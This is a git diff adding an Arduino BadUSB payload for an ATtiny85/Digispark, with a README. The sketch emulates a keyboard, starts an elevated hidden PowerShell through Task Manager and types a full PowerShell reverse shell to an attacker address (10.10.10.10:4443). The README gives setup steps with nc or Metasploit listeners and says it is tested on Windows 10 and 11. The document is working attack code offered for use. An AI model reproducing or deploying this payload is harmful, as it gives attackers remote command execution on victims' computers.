diff --git a/payloads/Instant Shell/Instant_Shell.ino b/payloads/Instant Shell/Instant_Shell.ino new file mode 100644 index 0000000..6481d5b --- /dev/null +++ b/payloads/Instant Shell/Instant_Shell.ino @@ -0,0 +1,33 @@ +#include "DigiKeyboard.h" +#define KEY_TAB 0x2b +void setup() { + pinMode(1, OUTPUT); //LED on Model A +} +void loop() { + DigiKeyboard.update(); + DigiKeyboard.sendKeyStroke(0); + DigiKeyboard.delay(3000); + + DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run + DigiKeyboard.delay(500); + DigiKeyboard.println("taskmgr"); //starting taskmgr + DigiKeyboard.delay(5000); + DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT); + DigiKeyboard.sendKeyStroke(KEY_N);//run + DigiKeyboard.delay(2000); + DigiKeyboard.print("powershell -noexit -command \"mode con cols=18 lines=1\"");//start tiny PowerShell + DigiKeyboard.sendKeyStroke(KEY_TAB); + DigiKeyboard.sendKeyStroke(KEY_SPACE);//turn on admin privileges + DigiKeyboard.sendKeyStroke(KEY_ENTER); //run + DigiKeyboard.delay(5000); + DigiKeyboard.println("taskkill /IM \"taskmgr.exe\" /F ");//killing taskmanager + DigiKeyboard.delay(2000); + DigiKeyboard.println("cmd");//run cmd + DigiKeyboard.delay(2000); + DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker + DigiKeyboard.delay(5000); + digitalWrite(1, HIGH); //turn on led when program finishes + DigiKeyboard.delay(90000); + digitalWrite(1, LOW); + DigiKeyboard.delay(5000); +} diff --git a/payloads/Instant Shell/README.md b/payloads/Instant Shell/README.md new file mode 100644 index 0000000..c08889a --- /dev/null +++ b/payloads/Instant Shell/README.md @@ -0,0 +1,13 @@ +# Instant Shell + +### Description: + +#### 1: Install_Shell.ino:
+Starting instant shell to an attacker machine in less than 1 minute.
+ +**Instuctions:**
Start an nc listener or metasploit listener. Be sure to change IP and Port. Depends on your computer, play with the delay.
+ +**Tested on:**
+**OS**: Windows 10|11
+**User**: Admin/Normal User
+**Hardware**: ATtiny85